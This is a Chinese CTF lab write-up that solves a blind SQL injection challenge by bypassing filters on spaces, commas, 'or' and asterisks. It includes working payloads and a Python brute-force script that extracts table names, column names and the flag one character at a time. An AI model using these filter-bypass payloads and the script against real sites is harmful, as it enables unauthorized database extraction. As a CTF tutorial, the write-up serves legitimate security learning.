实验吧——认真一点(绕过空格,逗号,关键字过滤等 sql盲注)
题目地址:http://ctf5.shiyanbar.com/web/earnest/index.php
过滤和拦截了某些东西,我经过多次尝试,最终构造的是
1'=(ascii(mid((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database()))from(1)))>1)='1
其中过滤了一次or,所以information里的or要双写,substr中有逗号,所以mid代替,空格则用括号代替,/**/注释符不行是因为服务器过滤了*
服务器的sql查询当且仅当返回只一条数据时才回显you are in
(ascii(mid((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database()))from(1)))>1)
的值要么为假0,要么为真1,由此便可猜解
写了个python脚本
(脚本中的爆破方法是一个个字符进行比对,其实为了提高效率可以写二分法,简便点就用这个方法,还有本来我的字符集只有字母数字下划线和逗号,但是猜解列名的时候发现不完整,所以手动判断了下(id=1'=(ascii(mid((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='fiag'))from(3)))=36)='1&submit=),第三位是$这个字符,才在字符集里加了这个,遇见问题要灵活判断,当然这也是因为我脚本写的烂 /笑哭)
1 # -*- coding: utf-8 -*- 2 import requests 3 4 strall=" !~{}_,:$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" 5 6 url='http://ctf5.shiyanbar.com/web/earnest/index.php' 7 8 headers={ 9 'Content-Type': 'application/x-www-form-urlencoded' 10 } 11 12 #fiag 13 def func1(): 14 result='' 15 for index in range(1,1000): 16 for i in strall: 17 data="id=1'=(ascii(mid((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema=database()))from({})))={})='1&submit=".format(str(index),str(ord(i))) 18 print data 19 r=requests.post(url=url,data=data,headers=headers) 20 if r.text.find('You are in') >=0: 21 result+=i 22 print result 23 break 24 elif i=='9': 25 print result 26 return 27 28 #fL$4G 29 def func2(): 30 result='' 31 for index in range(1,1000): 32 for i in strall: 33 data="id=1'=(ascii(mid((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name='fiag'))from({})))={})='1&submit=".format(str(index),str(ord(i))) 34 print data 35 r=requests.post(url=url,data=data,headers=headers) 36 if r.text.find('You are in') >=0: 37 result+=i 38 print result 39 break 40 elif i=='9': 41 print result 42 return 43 44 45 def func3(): 46 result='' 47 for index in range(1,1000): 48 for i in strall: 49 data="id=1'=(ascii(mid((select(group_concat(fL$4G))from(fiag))from({})))={})='1&submit=".format(str(index),str(ord(i))) 50 print data 51 r=requests.post(url=url,data=data,headers=headers) 52 if r.text.find('You are in') >=0: 53 result+=i 54 print result 55 break 56 elif i=='9': 57 print result 58 return 59 60 61 62 #func1() 63 #func2() 64 func3() 65 66 67 raw_input('done')
网站访问速度慢点话,猜解这个是真的慢!!!
还是建议写二分法!!!